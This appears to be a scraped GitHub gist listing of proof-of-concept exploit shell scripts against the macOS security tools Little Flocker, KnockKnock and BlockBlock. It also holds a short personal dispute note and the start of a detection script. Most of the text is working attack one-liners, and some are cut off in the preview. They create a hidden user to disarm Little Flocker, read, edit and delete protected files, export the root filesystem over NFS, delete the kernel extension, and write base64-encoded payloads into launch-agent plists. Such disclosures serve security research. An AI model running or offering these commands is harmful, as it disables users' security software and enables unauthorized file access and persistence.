Sabri pwnsdx

@pwnsdx
pwnsdx / ff.sh
Last active Dec 13, 2018
Multiple low severity issues in Little Flocker (<=0.3.1)
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appears
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folder/file, therefore an
# attacker can create startup items in these places (thanks Patrick Wardle):
pwnsdx / response.txt
Last active Jul 23, 2017
Response to the new shitty pastebin regarding me
Hello,
Here is the last discussion I had with him (he dared to mention me on a 10-day-old topic and then, when I give arguments on the very same topic or reply to his attacks, I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebins: https://i.imgur.com/TRqgn5g.png
pwnsdx / ff.sh
Last active May 31, 2018
Disarm Little Flocker silently (<=0.1.1)
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
pwnsdx / kk.sh
Last active Dec 22, 2018
Bypass KnockKnock (& BlockBlock) LaunchAgents/LaunchDaemons detection (CLI+UI versions) (<=1.9.0, 0DAY)
# Inject malicious data into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious data into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
pwnsdx / ff.sh
Last active May 31, 2018
High severity vulnerability in Little Flocker (previously named FlockFlock) (>=0.0.71 <=0.0.74)
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
pwnsdx / ff.sh
Last active Aug 29, 2016
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE
pwnsdx / ff.sh
Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT)
View detect.sh
#!/bin/bash
echo "Please wait..."
# Look for suspect files
/usr/bin/find -E /Applications -iregex '.*\.app\/(.*\.DS_Store|Icon.{1})$' > /tmp/.suspectfiles
# Check suspect files
appsCounter=0
while read path; do
pwnsdx / ff.sh
Last active Jan 7, 2017
Critical vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.45)
# Access, modify or delete any files on the hard drive (except SIP'ed files of course)
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned
# Or just delete Little Flocker kext?
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned && rm -rf /tmp/.pwned/Library/Extensions/LittleFlocker.kext/Contents/MacOS/LittleFlocker
View gist:c9fa935acf3524e2543ac9c88078629e
xattr -wx com.apple.FinderInfo 69636F6E4D414353401000000000000000000000000000000000000000000000 [file; buggy on dirs]